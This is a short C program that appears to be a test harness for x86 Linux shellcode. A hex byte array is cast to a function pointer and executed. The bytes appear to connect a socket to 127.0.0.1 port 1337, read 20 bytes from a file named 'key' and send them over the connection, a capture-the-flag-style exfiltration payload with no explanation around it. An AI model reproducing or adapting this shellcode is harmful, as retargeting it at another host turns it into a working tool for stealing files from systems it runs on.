#include <stdio.h>

int main( void )
{

	char SC[] = "\x6A\x00\x6A\x01\x6A\x02\x89\xE1\x6A\x66\x58\xBB\x01\x00\x00\x00\xCD\x80\x50\x5F\xB8\x7F\x00\x00\x01\x50\xB8\x02\x00\x05\x39\x50\x89\xE3\x6A\x10\x53\x57\x89\xE1\xBB\x03\x00\x00\x00\xB8\x66\x00\x00\x00\xCD\x80\x31\xC9\x51\xB8\x05\x00\x00\x00\x68\x6B\x65\x79\x00\x89\xE3\xCD\x80\x50\x5E\xBA\x14\x00\x00\x00\x89\xE1\x89\xF3\xB8\x03\x00\x00\x00\xCD\x80\xBA\x14\x00\x00\x00\x89\xC9\x89\xFB\xB8\x04\x00\x00\x00\xCD\x80";

    void( *shell)() = (void*)&SC;
    shell();
    return 0;
}